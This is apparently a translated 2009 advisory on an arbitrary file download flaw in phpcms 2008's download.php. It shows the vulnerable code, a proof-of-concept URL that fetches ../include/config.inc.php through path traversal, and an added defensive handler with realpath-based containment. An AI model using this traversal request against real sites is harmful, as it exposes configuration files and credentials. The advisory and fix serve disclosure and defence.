phpcms 2008 arbitrary download vulnerability - vulnerability warning - the black bar safety net

2009-10-20T00:00:00
ID MYHACK58:62200925075
Type myhack58
Reporter 佚名 (anonymous)
Modified 2009-10-20T00:00:00

Description

Author: Dr.  Vulnerable file: download.php

<?php
require dirname(__FILE__).'/include/common.inc.php';

$a_k = phpcms_auth($a_k, 'DECODE', AUTH_KEY); // note!! (the key constant name is garbled in the source text; AUTH_KEY is assumed)
if(empty($a_k)) showmessage($LANG['illegal_parameters']);
parse_str($a_k); // the decoded parameters are written straight into the global scope

if(isset($i)) $downid = intval($i);
if(!isset($m)) showmessage($LANG['illegal_parameters']);
if(empty($f)) showmessage('address failure');
if(!$i || $m<0) showmessage($LANG['illegal_parameters']);
if(!isset($t)) showmessage($LANG['illegal_parameters']);
if(!isset($ip)) showmessage($LANG['illegal_parameters']);
$starttime = intval($t);

$fileurl = trim($f);
if(!$downid || empty($fileurl) || !preg_match("/[0-9]{10}/", $starttime) || !preg_match("/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/", $ip) || $ip != IP) showmessage($LANG['illegal_parameters']);

$endtime = TIME - $starttime;
if($endtime > 3600) showmessage('address failure');
if($m) $fileurl = trim($s).trim($fileurl);

if(strpos($fileurl, '://')) // remote file
{
    header("Location: $fileurl");
}
else // local file
{
    if($d == 0)
    {
        header("Location: ".SITE_URL.$fileurl);
    }
    else
    {
        $fileurl = file_exists($fileurl) ? stripslashes($fileurl) : PHPCMS_ROOT.$fileurl; // here $fileurl may already be a physical path
        $filename = basename($fileurl);
        if(preg_match("/^([\s\S]*?)([\x81-\xfe][\x40-\xfe])([\s\S]*?)/", $fileurl)) // handle Chinese file names
        {
            $filename = str_replace(array("%5C", "%2F", "%3A"), array("\\", "/", ":"), urlencode($fileurl));
            $filename = urldecode(basename($filename));
        }
        file_down($fileurl, $filename);
    }
}
?>

The file_down() helper called above:

function file_down($filepath, $filename = '')
{
    if(!$filename) $filename = basename($filepath);
    if(is_ie()) $filename = rawurlencode($filename);
    $filetype = fileext($filename);
    $filesize = sprintf("%u", filesize($filepath));
    if(ob_get_length() !== false) @ob_end_clean();
    header('Pragma: public');
    header('Last-Modified: '.gmdate('D, d M Y H:i:s').' GMT');
    header('Cache-Control: no-store, no-cache, must-revalidate');
    header('Cache-Control: pre-check=0, post-check=0, max-age=0');
    header('Content-Transfer-Encoding: binary');
    header('Content-Encoding: none');
    header('Content-type: '.$filetype);
    header('Content-Disposition: attachment; filename="'.$filename.'"');
    header('Content-length: '.$filesize);
    readfile($filepath); // the path is sent back as-is, with no check that it lies under a download directory
    exit;
}

In fact, $i, $m, $f, $ip and so on are all query-string parameters that are never filtered (as can be seen in download.php); they are obtained after parse_str($a_k). Because $a_k first has to be decrypted by phpcms_auth() in DECODE mode before the parameters are obtained, I tried in my local test to construct an encrypted value for $a_k, but without success. So I changed approach: I set $a_k to a value that decodes to a non-existent parameter, and then $i, $m, $f, $ip below are simply taken from what I add directly in the address bar! The test is as follows:

http://www.xxxx.cn/download.php?a_k=Jh5zIw==&i=20&m=2&f=../include/config.inc.php&t=2233577313&ip=119.123.178.19&s=m/&d=1
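Two things go wrong in the download.php shown above: the request parameters end up as global variables (parse_str() writes into the global scope, and the values the author supplied in the address bar are picked up in the same way), and the resolved local path reaches file_down() with no check that it lies inside a download directory, so a relative name such as ../include/config.inc.php is served. The following is an added example, not phpcms code, of how a handler can read the parameters from the decoded token into an array instead of globals and resolve the requested name with realpath() inside an allow-listed root. DOWNLOAD_ROOT, safe_download_path(), download_params_from_token() and serve_download() are names chosen for this illustration; the demo at the bottom builds its own temporary directory tree.

```php
<?php
// Added example (not phpcms code): a download handler that only serves
// files resolving to a location under an allow-listed directory.
// DOWNLOAD_ROOT and the function names below are assumptions for this illustration.

define('DOWNLOAD_ROOT', __DIR__ . '/uploadfile');

/**
 * Return the resolved path of $requested if it is a regular file under $root,
 * otherwise null. realpath() collapses "..", "." and symlinks before the
 * containment check, so encoded or linked escapes are rejected as well.
 */
function safe_download_path(string $requested, string $root = DOWNLOAD_ROOT): ?string
{
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;
    }
    $candidate = realpath($rootReal . '/' . $requested);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // The resolved path must start with the root followed by a separator.
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

/**
 * Parse the decoded token into an array and read explicit keys from it.
 * Nothing from the query string can supply a missing key this way.
 */
function download_params_from_token(string $decoded): ?array
{
    parse_str($decoded, $p);
    foreach (['i', 'f', 't', 'ip'] as $k) {
        if (!isset($p[$k])) {
            return null;
        }
    }
    return [
        'id'    => (int) $p['i'],
        'file'  => trim((string) $p['f']),
        'start' => (int) $p['t'],
        'ip'    => (string) $p['ip'],
    ];
}

/** Serve the file named in an already-decrypted token, or refuse. */
function serve_download(string $decodedToken, string $clientIp, int $now): void
{
    $p = download_params_from_token($decodedToken);
    if ($p === null || $p['id'] <= 0 || $p['ip'] !== $clientIp || $now - $p['start'] > 3600) {
        http_response_code(403);
        exit('illegal parameters');
    }
    $path = safe_download_path($p['file']);
    if ($path === null) {
        http_response_code(404);
        exit('address failure');
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . rawurlencode(basename($path)) . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
    exit;
}

if (PHP_SAPI === 'cli') {
    // Constructed demo: a temporary root with one public file and one file outside it.
    $root = sys_get_temp_dir() . '/dl_demo_' . getmypid();
    mkdir($root . '/public', 0700, true);
    file_put_contents($root . '/public/report.pdf', 'public content');
    file_put_contents($root . '/config.inc.php', 'secret content');

    var_dump(safe_download_path('report.pdf', $root . '/public') !== null);        // inside the root: served
    var_dump(safe_download_path('../config.inc.php', $root . '/public') === null); // escapes the root: refused
    var_dump(download_params_from_token('x=1') === null);                          // required keys missing: refused

    unlink($root . '/public/report.pdf');
    unlink($root . '/config.inc.php');
    rmdir($root . '/public');
    rmdir($root);
}
```

Run it from the command line with `php example.php` to exercise the demo branch. The containment test compares the resolved path against the root prefix rather than searching the input for "../", which is why a symlink placed inside the download directory and pointing elsewhere is also refused: realpath() follows it first, and the target no longer starts with the root.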